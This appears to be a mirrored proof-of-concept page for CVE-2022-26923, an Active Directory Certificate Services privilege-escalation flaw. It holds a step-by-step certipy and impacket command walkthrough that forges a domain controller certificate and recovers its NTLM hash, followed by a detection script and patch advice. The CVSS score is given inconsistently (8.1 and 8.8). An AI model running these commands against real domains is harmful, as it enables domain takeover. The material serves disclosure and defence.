Related vulnerability
Title:
Microsoft Windows Active Directory trust management vulnerability
(CVE-2022-26923)
Description: Microsoft Windows Active Directory is a centralized directory management service from Microsoft (US) for medium and large network environments. It stores information about objects on the network and makes it easy for administrators and users to find and use that information. Microsoft Windows Active Directory has a trust management vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Syst
Description
The vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.
Introduction
# CVE-2022-26923 AD Certificate Services
* **Date of publication** : 10/05/2022
* Attack complexity: Low
* Privileges required: Low
* **CVSS Score :** <span style='color:red;'>8.1</span>
The vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.
An exploit was developed by Oliver Lyak (ly4k_) in Python and was published before the advisory, not after it. It is declared as a proof-of-concept. The exploit is available for download at research.ifcr.dk.
**Source :**
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
- https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
- https://vuldb.com/fr/?id.199368
## Description
The newly revealed Active Directory domain privilege escalation flaw has not yet been exploited in the wild, but its high CVSS score of 8.8 points to the high risk it poses to affected systems by letting attackers abuse certificate issuance. CVE-2022-26923 allows manipulating the DnsHostName attribute, which specifies the computer name as it is registered in DNS, and then enables an adversary to obtain a certificate from AD Certificate Services for that name, potentially leading to elevation of privilege.
## POC
- Username: user_test
- Password: Password123#
- Domain: my.domain.com
To reproduce you must:
- Have impacket and certipy installed on the attacking machine:
  - https://github.com/SecureAuthCorp/impacket
  - https://github.com/ly4k/Certipy
- Have compromised a user with low privilege.
- Note that a system is vulnerable only if Active Directory Certificate Services is running in the domain.
1. Let's start by generating a certificate for our low-privilege AD user (Username=user_test Password=Password123#) using the certificate template User:
````
certipy req 'my.domain.com/user_test:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template User
````
2. Let's check that the certificate is valid and that it can be used for Kerberos authentication via Certipy:
````
certipy auth -pfx user_test.pfx
````
3. Add a new computer account to the domain with Impacket:
````
addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'
# my.domain.com/user_test:Password123# - We need to provide valid AD credentials in order to add a new computer.
# method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.
# computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.
# computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.
````
4. Let's generate a certificate for the new computer we created. To use the machine account of said computer, you need to add a "$" at the end of the name:
````
certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
````
5. On the compromised machine, check the current DNS hostname and SPN attributes of the new computer before updating them:
````
PS C:\Users\user_test> Get-ADComputer NEW_PC -properties dnshostname,serviceprincipalname
````
6. Clear the computer's current SPN attribute:
````
PS C:\Users\user_test> Set-ADComputer NEW_PC -ServicePrincipalName @{}
````
7. Try to set the DNS hostname attribute to that of the DC:
````
PS C:\Users\user_test> Set-ADComputer NEW_PC -DnsHostName HOSTNAME.my.domain.com
````
8. On the attacking machine, request a new certificate for the modified computer account, which now carries the DC's DNS hostname:
````
certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
````
9. Verify that this certificate works and returns the NTLM hash:
````
certipy auth -pfx hostname.pfx
````
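The defender-side counterpart to steps 5-7: the abuse leaves a computer object whose dNSHostName no longer matches its own account name, collides with another host (here the DC), and whose SPNs have been emptied. The script below is an added example, not part of the original README or of Certipy; it assumes computer-account records have been exported from LDAP as dicts with the attribute names `sAMAccountName`, `dNSHostName` and `servicePrincipalName`, and the sample records are constructed to mirror the walkthrough above.

```python
"""Flag dNSHostName tampering of the kind used in CVE-2022-26923 (Certifried)."""
from collections import defaultdict


def expected_dns_name(sam_account_name, domain):
    # Machine accounts are "NAME$"; their default dNSHostName is name.domain.
    return f"{sam_account_name.rstrip('$')}.{domain}".lower()


def find_dnshostname_anomalies(computers, domain):
    """Return (account, issue, detail) tuples for suspicious computer objects."""
    findings = []
    by_dns = defaultdict(list)
    for c in computers:
        dns = (c.get("dNSHostName") or "").lower()
        if dns:
            by_dns[dns].append(c["sAMAccountName"])
    for c in computers:
        sam = c["sAMAccountName"]
        dns = (c.get("dNSHostName") or "").lower()
        # A dNSHostName that does not derive from the account name is the core signal.
        if dns and dns != expected_dns_name(sam, domain):
            findings.append((sam, "dNSHostName mismatch", dns))
        # Two accounts claiming the same DNS name: the impersonated host shows up too.
        if dns and len(by_dns[dns]) > 1:
            others = [o for o in by_dns[dns] if o != sam]
            findings.append((sam, "dNSHostName collision", ",".join(others)))
        # Step 6 clears the SPNs; a legitimately joined machine normally keeps HOST/... SPNs.
        if not c.get("servicePrincipalName"):
            findings.append((sam, "empty servicePrincipalName", ""))
    return findings


# Constructed sample: the DC, a normal workstation, and NEW_PC$ after steps 6 and 7.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "HOSTNAME$", "dNSHostName": "hostname.my.domain.com",
     "servicePrincipalName": ["HOST/hostname.my.domain.com", "ldap/hostname.my.domain.com"]},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.my.domain.com",
     "servicePrincipalName": ["HOST/ws01.my.domain.com"]},
    {"sAMAccountName": "NEW_PC$", "dNSHostName": "hostname.my.domain.com",
     "servicePrincipalName": []},
]

if __name__ == "__main__":
    for sam, issue, detail in find_dnshostname_anomalies(SAMPLE_COMPUTERS, "my.domain.com"):
        print(f"{sam}: {issue} {detail}")
```

Running it against a real export (for example the output of the Get-ADComputer query in step 5 over all computers) lists NEW_PC$ three times and the DC once for the collision, while WS01$ is silent.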
## Mitigations and Fixes
For CVE-2022-26923 mitigation and protective measures, Microsoft strongly recommends updating all servers that run AD Certificate Services and all Windows domain controllers that perform certificate-based authentication to the May 10, 2022 update:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
File snapshot
[4.0K] /data/pocs/b72d666635713ed0453da18f5660fea0bc093bee
└── [4.5K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.